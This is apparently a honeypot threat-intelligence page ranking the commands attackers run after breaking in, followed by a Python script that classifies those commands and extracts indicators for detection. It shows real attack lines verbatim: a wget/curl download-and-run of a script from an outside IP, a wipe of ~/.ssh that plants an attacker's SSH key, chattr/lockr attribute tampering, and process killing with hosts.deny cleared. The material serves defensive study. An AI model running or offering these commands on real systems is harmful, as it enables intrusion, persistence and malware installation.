Commands Executed

Real-time analysis of the commands attackers run most often after gaining access to a system. Data collected from our global honeypot network over the last 24 hours.

9789 commands in 24h

Top Commands Executed

Each entry gives the rank, the command exactly as captured (after the "$" prompt), the number of source IPs that ran it, and the number of executions.

1. $ Enter new UNIX password:
   277 IPs, 687x
2. $ uname -s -v -n -m 2 > /dev/null
   151 IPs, 516x
3. $ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc || grep -c "^processor" /proc/cpuinfo) 2>/dev/null | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version
   144 IPs, 469x
4. $ lockr -ia .ssh
   337 IPs, 468x
5. $ cd ~; chattr -ia .ssh; lockr -ia .ssh
   296 IPs, 391x
6. $ uname -a
   284 IPs, 379x
7. $ uname
   286 IPs, 376x
8. $ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
   292 IPs, 375x
9. $ cat /proc/cpuinfo | grep name | wc -l
   288 IPs, 373x
10. $ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
    289 IPs, 371x
11. $ uname -m
    276 IPs, 366x
12. $ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
    279 IPs, 363x
13. $ crontab -l
    275 IPs, 361x
14. $ whoami
    276 IPs, 361x
15. $ w
    276 IPs, 359x
16. $ lscpu | grep Model
    273 IPs, 357x
17. $ cat /proc/cpuinfo | grep model | grep name | wc -l
    273 IPs, 356x
18. $ top
    270 IPs, 355x
19. $ which ls
    267 IPs, 344x
20. $ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
    266 IPs, 340x
21. $ ls -lh $(which ls)
    258 IPs, 317x
22. $ cat /proc/uptime 2 > /dev/null | cut -d. -f1
    57 IPs, 301x
23. $ uname -m 2 > /dev/null
    57 IPs, 159x
24. $ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
    73 IPs, 75x
25. $ /bin/./uname -s -v -n -r -m
    15 IPs, 37x
26. $ uname -s -v -n -r -m
    13 IPs, 28x
27. $ if [ [ ! -d ${HOME}/.ssh ] ]
    6 IPs, 15x
28. $ then
    6 IPs, 15x
29. $ nproc
    6 IPs, 14x
30. $ cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android
    4 IPs, 13x

Reconnaissance

Commands that gather system information (uname, whoami, cat /etc/passwd)

Download

Commands that fetch malware (wget, curl, tftp)

Persistence

Commands that keep access (crontab, chmod, chattr)

Lateral Movement

Commands that spread across the network (ssh, scp, ping)

About this data

These commands are captured in real time when attackers gain access to our honeypots. They represent the actual techniques used in automated and manual attacks. Use this information to improve your threat detection and incident response.
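As an added example (not part of this page and not the honeypot's own tooling), the Python script below turns a batch of captured command lines into the four categories defined above and pulls out the indicators an analyst would act on: the public key appended to authorized_keys (with its SHA256 fingerprint), chattr/lockr tampering with the attributes of ~/.ssh, and the host of every download URL. The category keywords are the ones the page lists, extended with binaries that appear in the table (w, top, free, df, lscpu, nproc, which, ls, lockr); that extension, the function names, and the sample input built from table entries 1, 2, 5, 8, 9, 13 and 30 are this example's own assumptions.

```python
"""Classify honeypot-captured command lines into the four categories this
page uses and extract the indicators worth alerting on.

Added example for this page, not the honeypot's own code. CATEGORIES starts
from the page's keyword lists and adds binaries seen in the table above
(w, top, free, df, lscpu, nproc, which, ls, lockr); filing them under these
categories is an assumption. SAMPLE_COMMANDS is constructed from table
entries 1, 2, 5, 8, 9, 13 and 30.
"""
import base64
import hashlib
import re
from collections import Counter

CATEGORIES = {
    "reconnaissance": {"uname", "whoami", "cat", "w", "top", "nproc", "lscpu",
                       "free", "df", "which", "ls"},
    "download": {"wget", "curl", "tftp"},
    # The page files crontab under persistence; `crontab -l` only reads the
    # table, but it is the step a bot takes before writing its own entry.
    "persistence": {"crontab", "chmod", "chattr", "lockr"},
    "lateral_movement": {"ssh", "scp", "ping"},
}

# Separators between simple commands in a compound line.
SPLIT_RE = re.compile(r"\s*(?:\|\||&&|;|\|)\s*")
# Public key appended to authorized_keys: key type, base64 blob, optional comment.
SSH_KEY_RE = re.compile(
    r"(ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-[\w-]+)\s+([A-Za-z0-9+/=]+)"
    r"(?:\s+([^\s\"']+))?[\"']?\s*>>?\s*\S*authorized_keys")
# chattr/lockr touching the immutable (i) or append-only (a) bits on .ssh.
IMMUTABLE_RE = re.compile(r"\b(?:chattr|lockr)\b[^;&|]*\s[-+][ia]+\b[^;&|]*\.ssh")
# Host part of any http(s) URL on the line.
URL_RE = re.compile(r"https?://([^/\s\"']+)")

# Constructed sample input, copied from table entries 1, 2, 5, 8, 9, 13 and 30.
SAMPLE_COMMANDS = [
    "Enter new UNIX password:",
    "uname -s -v -n -m 2 > /dev/null",
    "cd ~; chattr -ia .ssh; lockr -ia .ssh",
    'cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa '
    "AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/"
    "+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww"
    "+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw=="
    ' mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~',
    "cat /proc/cpuinfo | grep name | wc -l",
    "crontab -l",
    "cd /data/local/tmp/; wget http://140.233.190.82/cat.sh || "
    "curl http://140.233.190.82/cat.sh -o cat.sh; chmod 777 cat.sh; sh cat.sh android",
]


def command_words(line):
    """Command word of every simple command in a compound line. Command
    substitutions are flattened (`x=$(uname -m)` yields `uname`) and leading
    `export`/VAR=... assignments are skipped, so only invoked binaries return."""
    flat = line.replace("$(", ";").replace(")", ";")
    words = []
    for seg in SPLIT_RE.split(flat):
        tokens = seg.split()
        while tokens and ("=" in tokens[0] or tokens[0] == "export"):
            tokens.pop(0)
        if tokens:
            # "/bin/./uname" -> "uname", "(nproc" -> "nproc"
            words.append(tokens[0].lstrip("(").rsplit("/", 1)[-1])
    return words


def classify(line):
    """Page categories the line falls into; empty for unrecognised input such
    as the `Enter new UNIX password:` prompt recorded as entry 1."""
    words = set(command_words(line))
    return {cat for cat, names in CATEGORIES.items() if words & names}


def key_fingerprint(blob):
    """OpenSSH-style SHA256 fingerprint of a base64 key blob, or None when the
    blob does not decode (for example because the capture truncated it)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except ValueError:
        return None
    return "SHA256:" + base64.b64encode(hashlib.sha256(raw).digest()).decode().rstrip("=")


def extract_indicators(line):
    """Artefacts to block or hunt for: injected key, ~/.ssh attribute tampering,
    download hosts."""
    found = {}
    match = SSH_KEY_RE.search(line)
    if match:
        ktype, blob, comment = match.groups()
        found["authorized_key"] = {"type": ktype, "comment": comment,
                                   "fingerprint": key_fingerprint(blob)}
    if IMMUTABLE_RE.search(line):
        found["ssh_dir_attr_tamper"] = True
    hosts = sorted(set(URL_RE.findall(line)))
    if hosts:
        found["download_hosts"] = hosts
    return found


def summarize(lines):
    """Category counts over a batch of lines; unmatched lines count as "other"."""
    counts = Counter()
    for line in lines:
        counts.update(classify(line) or {"other"})
    return counts


if __name__ == "__main__":
    for line in SAMPLE_COMMANDS:
        print(sorted(classify(line)) or ["other"], extract_indicators(line), line[:50])
    print(dict(summarize(SAMPLE_COMMANDS)))
```

Run as-is it prints the categories and indicators for each sample line; feed it the full command export to get the per-category counts. Entries 4, 5 and 8 of the table are what the authorized_key and ssh_dir_attr_tamper indicators target: the attacker clears the immutable and append-only attributes on ~/.ssh (chattr -ia) and replaces authorized_keys with a single key, and the key's fingerprint is the value to search for on other hosts and add to a blocklist. The splitter is deliberately crude (it also splits inside quoted strings), which is acceptable for classification but not for reconstructing the exact command; treat its output as a triage signal, not a parser.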